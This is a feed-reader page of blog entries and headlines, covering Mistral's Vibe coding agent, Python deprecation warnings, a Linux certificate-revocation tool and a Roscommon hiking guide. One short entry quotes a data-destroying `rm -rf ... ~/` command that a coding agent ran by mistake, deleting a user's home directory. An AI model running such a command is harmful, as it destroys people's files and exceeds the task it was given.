2025-12-09T20:19:21+00:00 from Simon Willison's Weblog

mistralai/mistral-vibe

Here's the Apache 2.0 licensed source code for Mistral's new "Vibe" CLI coding agent, released today alongside Devstral 2.

It's a neat implementation of the now standard terminal coding agent pattern, built in Python on top of Pydantic and Rich/Textual (here are the dependencies.) Gemini CLI is TypeScript, Claude Code is closed source (TypeScript, now on top of Bun), OpenAI's Codex CLI is Rust. OpenHands is the other major Python coding agent I know of, but I'm likely missing some others. (UPDATE: Kimi CLI is another open source Apache 2 Python one.)

The Vibe source code is pleasant to read and the crucial prompts are neatly extracted out into Markdown files. Some key places to look:

core/prompts/cli.md is the main system prompt ("You are operating as and within Mistral Vibe, a CLI coding-agent built by Mistral AI...")
core/prompts/compact.md is the prompt used to generate compacted summaries of conversations ("Create a comprehensive summary of our entire conversation that will serve as complete context for continuing this work...")
Each of the core tools has its own prompt file:

The Python implementations of those tools can be found here.

I tried it out and had it build me a Space Invaders game using three.js with the following prompt:

make me a space invaders game as HTML with three.js loaded from a CDN

Here's the source code and the live game (hosted in my new space-invaders-by-llms repo). It did OK.

Tags: python, ai, prompt-engineering, generative-ai, llms, textual, ai-assisted-programming, mistral, pydantic, vibe-coding, coding-agents, system-prompts, space-invaders

Private Indices Are the New Public Indices

Tue, 09 Dec 2025 19:28:41 GMT from Matt Levine - Bloomberg Opinion Columnist

Also private credit is the new credit cards, engagement is the new AGI, everything is securities fraud and nothing is securities fraud.

In New York City, Congestion Pricing Leads to Marked Drop in Pollution

2025-12-09T09:12:00-05:00 from Yale E360

A new toll applied to cars driving in parts of New York City has led to a measurable drop in traffic, and with it, a 22 percent decline in particulate pollution, according to a new study.

Read more on E360 →

Quoting Claude

2025-12-09T12:04:43+00:00 from Simon Willison's Weblog

I found the problem and it's really bad. Looking at your log, here's the catastrophic command that was run:
rm -rf tests/ patches/ plan/ ~/
See that ~/ at the end? That's your entire home directory. The Claude Code instance accidentally included ~/ in the deletion command.

— Claude, after Claude Code deleted most of a user's Mac

Tags: ai-ethics, coding-agents, claude, claude-code, generative-ai, ai, llms

Barnum's Law of CEOs

2025-12-09T11:46:32Z from Charlie's Diary

It should be fairly obvious to anyone who's been paying attention to the tech news that many companies are pushing the adoption of "AI" (large language models) among their own employees--from software developers to management--and the push is coming from...

Barnum's Law of CEOs

2025-12-09T11:46:32Z from Charlie's Diary

Some notes on using systemd-run or systemd-cat for logging program output

2025-12-09T03:44:45Z from Chris's Wiki :: blog

Prediction: AI will make formal verification go mainstream

2025-12-09T03:11:19+00:00 from Simon Willison's Weblog

Prediction: AI will make formal verification go mainstream

Martin Kleppmann makes the case for formal verification languages (things like Dafny, Nagini, and Verus) to finally start achieving more mainstream usage. Code generated by LLMs can benefit enormously from more robust verification, and LLMs themselves make these notoriously difficult systems easier to work with.

The paper Can LLMs Enable Verification in Mainstream Programming? by JetBrains Research in March 2025 found that Claude 3.5 Sonnet saw promising results for the three languages I listed above.

Via lobste.rs

Tags: programming-languages, ai, generative-ai, llms, ai-assisted-programming, martin-kleppmann

Deprecations via warnings don’t work for Python libraries

2025-12-09T01:13:39+00:00 from Simon Willison's Weblog

Deprecations via warnings don’t work for Python libraries

Seth Larson reports that urllib3 2.6.0 released on the 5th of December and finally removed the HTTPResponse.getheaders() and HTTPResponse.getheader(name, default) methods, which have been marked as deprecated via warnings since v2.0.0 in April 2023. They had to add them back again in a hastily released 2.6.1 a few days later when it turned out major downstream dependents such as kubernetes-client and fastly-py still hadn't upgraded.

Seth says:

My conclusion from this incident is that DeprecationWarning in its current state does not work for deprecating APIs, at least for Python libraries. That is unfortunate, as DeprecationWarning and the warnings module are easy-to-use, language-"blessed", and explicit without impacting users that don't need to take action due to deprecations.

On Lobste.rs James Bennett advocates for watching for warnings more deliberately:

Something I always encourage people to do, and try to get implemented anywhere I work, is running Python test suites with -Wonce::DeprecationWarning. This doesn't spam you with noise if a deprecated API is called a lot, but still makes sure you see the warning so you know there's something you need to fix.

I didn't know about the -Wonce option - the documentation describes that as "Warn once per Python process".

Via lobste.rs

Tags: james-bennett, open-source, python, seth-michael-larson

Are Two Heads Better Than One?

2025-12-09T00:00:00.000Z from eieio.games

A look at the surprising probabilities behind a simple coin flipping game

LA Unified School District forces unfiltered AI on kids

Mon, 08 Dec 2025 22:32:50 +0000 from Pivot to AI

Last year, the Los Angeles Unified School District set up a fabulous all-encompassing AI chatbot friend to students and teachers, called Ed! Unfortunately, Ed didn’t work. AllHere, the company running Ed, went broke. The founder was arrested for fraud. LAUSD’s scheme for 2025 is to give every kid in Los Angeles an unmanaged iPad and/or […]

A Bidding War for Warner Bros.

Mon, 08 Dec 2025 18:22:22 GMT from Matt Levine - Bloomberg Opinion Columnist

Also the SEC shutdown, the CFPB pause and the DAT collapse.

NVIDIA Isn't Enron - So What Is It?

Mon, 08 Dec 2025 17:02:17 GMT from Ed Zitron's Where's Your Ed At

If you enjoy this free newsletter, why not subscribe to Where's Your Ed At Premium? It's $7 a month or $70 a year, and helps support me putting out these giant free newsletters!

At the end of November, NVIDIA put out an internal memo (that was

Sliabh Bawn Roscommon Day Hikes

Mon, 08 Dec 2025 15:46:49 +0000 from Tough Soles Blog

Sliabh Bawn is a quiet set of hills outside of the town of Strokestown.
The perfect place for an evening wander or dog walk.

Overview:

County: Roscommon
Distances:
- Trim Trail (green): 3km
- Yellow Loop Walk: 6.5km
- Monastery Trail (blue): 2.7km
- Orange Loop Walk: 4km
- Heritage Trail (white): 4.3km
- Equestrian Trail (pink): 8km
Elevation Gain: 50m - 200m
Format: Linear and Looped Trails
Time: 1 - 3 Hours
Start / End / Parking:
- Primary car park has room for about 10 cars, and is the closest to the playground (google maps link).
- Secondary parking: A lot of people park along the road in. Where the road widens, there is space for parking along the right-hand shoulder of the road (google maps link). There’s parking for about 10 cars.
Public Transport:
There is no public transport to any of the entrances to Slieve Bawn. There is a local link bus from Strokestown to Scramogue - after which it's a 2km walk to the northerly trail head.
Trail difficulty: Easy
These routes use to mostly gravel access roads and small gravel trails.
Read about trail grading in Ireland here.
Trail quality: 2/5
This is a nicely developed recreation area around the wind farm. There are a lot of access roads.
Views: 3/5
A mostly forest-focused trail, with some views at the Trooperstown end. Lovely native woodland paths for the southerly section.
Buggy/Wheelchair friendly: Not all loops, but certain gravel paths are accessible for buggies. Unsure if wheelchair accessible.
When did I walk this route: December 2025
Dogs allowed: Yes
External Links:
- Coillte info page on Sliabh Bawn

This set of two small hills has become something of a local walk for me. Between these two summits, six different trails have been looped, offering a mix of distances and elevation.

Following the White Heritage Trail from the primary car park, the trail starts with the only steep section, bringing you up to the Holy Cross on the summit of the smaller hill. Erected during the winter of 1950-51, the cross pre-dates all of the forestry and access roads. Donkeys and horses were used to get all of the building materials up to the summit. Like many such crosses across the country, most of the work and funding all came from local people to the area.

This is one of three religious sites on the loop - the second being the mass rock, and the third being an old church ruin.

In the 1950’s, the Government Department of Lands began to buy parcels of land across the two summits for forestry development. While a lot of the forestry in the last few decades has been conifer plantation, there are some small sections of native planting, and each time I visit I come across another new layer of flora or fauna that I wasn’t expecting to meet.

From meeting a large Common Irish Frog on the path, to learning that ladybirds hibernate on gorse bushes, I appreciate these unexpected moments of nature connection.

One of the main reasons that I’ve been on more walks here recently, is because of Laika, the bundle of chaos that we call our dog. She loves a long walk, and she and I can easily walk 8 - 10km here and meet almost no one.

Crossing over to the second and higher summit, you can find a trig point hidden away on the summit. At only 262m, it’s probably one of the smaller hills that you will find a trig point on. However it feels a lot taller than it is, due to just how flat the surrounding boglands are.

Back on the 24th January 2025, Storm Eowyn hit Ireland, causing unprecedented damage across the island. It’s estimated that 24,000 hectares of forestry was damaged in Ireland - over four times that typical annual felling of Coillte (or national forestry company). That means that not only did all of the forestry teams suddenly have to try and process four times as much timber, but because of how it fell in the storm, so much of the wood was cross-loaded on other trees, making it an even slower job to process.

The devastation felt raw last spring - but with some time between now and that initial shock, I’m choosing to see it as an opportunity for goals like 30 for 2030 or the doubling of recreation sites to 500 to reach even further.

Useful links:

Sliabh Bawn is an interesting place for me to write about - because it’s a simple place. In the outdoors, I think there are a few different categories of necessary outdoor spaces. There are the “show-stoppers” that you travel for - offering unique experiences and showcasing the beauty of that area. And there are the places for the local community - the places close by and easily accessed, that give you time and space outside.

For me, Sliabh Bawn falls into the latter category. In the setting sun on a windy day, the views and colours from here can be spectacular, but it is not somewhere that has been developed for its incredible beauty. It's there to give people living in the surrounding area a place to call theirs.

2022 Video 2025 Video

Notes:

December 2025: Storm damage from earlier this year (fallen trees) is still being cleared along the eastern slopes of Sliabh Bawn, impacting the White Trail. This looks to be cleared in the coming months, but at time of publication, it is recommended to detour along the pink (equine) trail for the eastern section.

Further exploring

Other day trails in the area:

Long distance trails:

Favourite Local Coffee / Food Options:

The closest shop to the trail is in Strokestown (SuperValu)
Frank’s Bar is close to the trailhead
Andersons Thatch Pub for traditional music, and a place to park up if you’re in a camper

Severe Heat Linked With Developmental Delays in Children

2025-12-08T10:00:00-05:00 from Yale E360

A study of thousands of children across the developing world found that those continually exposed to severe heat were more likely to see developmental delays.

Read more on E360 →

The Internet forgets, but I don’t want to

2025-12-08T09:46:34+00:00 from alexwlchan

I don't trust platforms to preserve my memories, so I built my own scrapbook of social media.

Turning to systemd units for easy capturing of log output

2025-12-08T03:17:29Z from Chris's Wiki :: blog

Addressing Linux's Missing PKI Infrastructure

Mon, 08 Dec 2025 00:00:00 +0000 from Blog on Jon Seager

This article was originally posted on the Ubuntu Discourse, and is reposted here. I welcome comments and further discussion in that thread.

Earlier this year, LWN featured an excellent article titled “Linux’s missing CRL infrastructure”. The article highlighted a number of key issues surrounding traditional Public Key Infrastructure (PKI), but critically noted how even the available measures are effectively ignored by the majority of system-level software on Linux.

One of the motivators for the discussion is that the Online Certificate Status Protocol (OCSP) will cease to be supported by Let’s Encrypt. The remaining alternative is to use Certificate Revocation Lists (CRLs), yet there is little or no support for managing (or even querying) these lists in most Linux system utilities.

To solve this, I’m happy to share that in partnership with rustls maintainers Dirkjan Ochtman and Joe Birr-Pixton, we’re starting the development of upki: a universal PKI tool. This project initially aims to close the revocation gap through the combination of a new system utility and eventual library support for common TLS/SSL libraries such as OpenSSL, GnuTLS and rustls.

The Problem #

Online Certificate Authorities responsible for issuing TLS certificates have long had mechanisms for revoking known bad certificates. What constitutes a known bad certificate varies, but generally it means a certificate was issued either in error, or by a malicious actor of some form. There have been two primary mechanisms for this revocation: Certificate Revocation Lists (CRLs) and the Online Certificate Status Protocol (OCSP).

In July 2024, Let’s Encrypt announced the deprecation of support for the Online Certificate Status Protocol (OCSP). This wasn’t entirely unexpected - the protocol has suffered from privacy defects which leak the browsing habits of users to Certificate Authorities. Various implementations have also suffered reliability issues that forced most implementers to adopt “soft-fail” policies, rendering the checks largely ineffective.

The deprecation of OCSP leaves us with CRLs. Both Windows and macOS rely on operating system components to centralise the fetching and parsing of CRLs, but Linux has traditionally delegated this responsibility to individual applications. This is done most effectively in browsers such as Mozilla Firefox, Google Chrome and Chromium, but this has been achieved with bespoke infrastructure.

However, Linux itself has fallen short by not providing consistent revocation checking infrastructure for the rest of userspace - tools such as curl, system package managers and language runtimes lack a unified mechanism to process this data.

The ideal solution to this problem, which is slowly becoming more prevalent, is to issue short-lived credentials with an expiration of 10 days or less, somewhat removing the need for complicated revocation infrastructure, but reducing certificate lifetimes is happening slowly and requires significant automation.

CRLite #

There are several key challenges with CRLs in practice - the size of the list has grown dramatically as the web has scaled, and one must collate CRLs from all relevant certificate authorities in order to be useful. CRLite was originally proposed by researchers at IEEE S&P and subsequently adopted in Mozilla Firefox. It offers a pragmatic solution to the problem of distributing large CRL datasets to client machines.

In a recent blog post, Mozilla outlined how their CRLite implementation meant that on average users “downloaded 300kB of revocation data per day, a 4MB snapshot every 45 days and a sequence of “delta-updates” in-between”, which amounts to CRLite being 1000x more bandwidth-efficient than daily CRL downloads.

At its core, CRLite is a data structure compressing the full set of web-PKI revocations into a compact, efficiently queryable form. You can find more information about CRLite’s design and implementation on Mozilla’s Security Blog.

Introducing upki #

Following our work on oxidizing Ubuntu, Dirkjan reached out to me with a proposal to introduce a system-level utility backed by CRLite to non-browser users.

upki will be an open source project, initially packaged for Ubuntu but available to all Linux distributions, and likely portable to other Unix-like operating systems. Written in Rust, upki supports three roles:

Server-side mirroring tool: responsible for downloading and mirroring the CRLite filters provided by Mozilla, enabling us to operate independent CDN infrastructure for CRLite users, and serving them to clients. This will insulate upki from changes in the Mozilla backend, and enable standing up an independent data source if required. The server-side tool will manifest as a service that periodically checks the Mozilla Firefox CRLite filters, downloads and validates the files, and serves them.
Client-side sync tool: run regularly by a systemd-timer, network-up events or similar, this tool ensures the contents of the CDN are reflected in the on-disk filter cache. This will be extremely low on bandwidth and CPU usage assuming everything is up to date.
Client-side query tool: a CLI interface for querying revocation data. This will be useful for monitoring and deployment workflows, as well as for users without a good C FFI.

The latter two roles are served by a single Rust binary that runs in different modes depending on how it is invoked. The server-side tool will be a separate binary, since its use will be much less widespread. Under the hood, all of this will be powered by Rust library crates that can be integrated in other projects via crates.io.

For the initial release, Canonical will stand up the backend infrastructure required to mirror and serve the CRLite data for upki users, though the backend will be configurable. This prevents unbounded load on Mozilla’s infrastructure and ensures long-term stability even if Firefox’s internal formats evolve.

Ecosystem Compatibility #

So far we’ve covered the introduction of a new Rust binary (and crate) for supporting the fetching, serving and querying of CRL data, but that doesn’t provide much service to the existing ecosystem of Linux applications and libraries in the problem statement.

The upki project will also provide a shared object library for a stable ABI that allows C and C-FFI programs to make revocation queries, using the contents of the on-disk filter cache.

Once upki is released and available, work can begin on integrating existing crypto libraries such as OpenSSL, GNUtls and rustls. This will be performed through the shared object library by means of an optional callback mechanism these libraries can use to check the revocation lists before establishing a connection to a given server with a certificate.

Timeline #

While we’ve been discussing this project for a couple of months, ironing out the details of funding and design, work will soon begin on the initial implementation of upki.

Our aim is to make upki available as an opt-in preview for the release of Ubuntu 26.04 LTS, meaning we’ll need to complete the implementation of the server/client functionality, and bootstrap the mirroring/serving infrastructure at Canonical before April 2026.

In the following Ubuntu release cycle, the run up to Ubuntu 26.10, we’ll aim to ship the tool by default on Ubuntu systems, and begin work on integration with the likes of NSS, OpenSSL, GNUtls and rustls.

Summary #

Linux has a clear gap in its handling of revocation data for PKIs. Over the coming months we’re hoping to address that gap by developing upki not just for Ubuntu, but for the entire ecosystem. Thanks to Mozilla’s work on CRLite, and the expertise of Dirkjan and Joe, we’re confident that we’ll deliver a resilient and efficient solution that should make a meaningful contribution to systems security across the web.

If you’d like to do more reading on the subject, I’d recommend the following:

LWN.net: Linux’s missing CRL infrastructure
Mozilla Security Blog: CRLite Part 1: All Web PKI Revocations Compressed
Mozilla Security Blog: CRLite Part 2: End-to-End Design
Let’s Encrypt: Replacing OCSP with CRLs
IEEE Symposium on Security & Privacy: CRLite: A Scalable System for Pushing All TLS Revocations to All Browsers

Horses

Mon, 08 Dec 2025 00:00:00 +0000 from andy l jones

AI progress is steady. Human equivalence is sudden.

What about “Nothing about us without us?”

2025-12-08T00:00:00Z from Anil Dash

Generating some SVGs of pelicans

I built the gallery component with Gemini 3 Flash

My passion is the mountains, but my second love is books.

Guidebooks

1. Wanderlust: British And Irish Isles by Gestalten

2. Irish Peaks by Mountaineering Ireland

3. The Hike Life: My Favourite 50 Hikes in Ireland by Rozanna Purcell & 4. The Hike Life: 50 More to Explore by Rozanna Purcell

5. Ireland's county high points by Kieron Gribbon

Information books

1. The Wildflowers of Ireland: A Field Guide by Zoe Devlin

2. Rock Climbing by Libby Peter

3. Loughcrew: The Cairns by Jean McMann

4. The Mountain Leader by Mike Raine

5. The Complete Walker IV by Colin Fletcher & Chip Rawlins

Too Lazy - Didn't Read

So what has changed?

What's the same?

Passkeys Are Still Hard to Conceptualise

Thought Leadership

It's Still Vendor Lockin

Cloud Keychains Are Still Blowing Up Data

Vendors Can Lock You Out

Authentication Providers Still Miscommunicate

Authentication Providers Are Still Playing Silly Games With User Choice

Conclusion

Too Lazy - Didn't Read

So what has changed?

What's the same?

Passkeys Are Still Hard to Conceptualise

Thought Leadership

It's Still Vendor Lockin

Cloud Keychains Are Still Blowing Up Data

Vendors Can Lock You Out

Authentication Providers Still Miscommunicate

Authentication Providers Are Still Playing Silly Games With User Choice

Conclusion

TL;DR

Some background

The process in detail

What can we learn from this?

First impressions of JustHTML

Turns out it was almost all built by LLMs

Vibe engineering, not vibe coding

"The agent did the typing"

Non radioactive:

Skills in ChatGPT

Skills in Codex CLI

Skills are a keeper

Key characteristics of GPT-5.2

It's better at vision

Rendering some pelicans

The anatomy of an HTML tool

Prototype with Artifacts or Canvas

Switch to a coding agent for more complex projects

Load dependencies from CDNs

Host them somewhere else

Take advantage of copy and paste

Build debugging tools

Persist state in the URL

Use localStorage for secrets or larger state

Collect CORS-enabled APIs

LLMs can be called directly via CORS

Don't be afraid of opening files

You can offer downloadable files too

Pyodide can run Python code in the browser

WebAssembly opens more possibilities

Remix your previous tools

Record the prompt and transcript

Go forth and build

Build Canada and Canada Spends

Datasette for data exploration

Processing PDFs

3. The Hike Life: My Favourite 50 Hikes in Ireland by Rozanna Purcell
& 4. The Hike Life: 50 More to Explore by Rozanna Purcell